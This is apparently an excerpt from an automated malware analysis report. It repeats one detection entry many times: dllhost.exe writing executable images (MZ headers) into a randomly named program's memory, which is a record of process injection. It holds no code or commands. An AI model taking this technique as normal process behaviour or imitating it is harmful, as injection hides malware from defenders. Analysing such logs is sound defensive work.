Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1290000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 6F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 490000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AF0000 value starts with: 4D5A
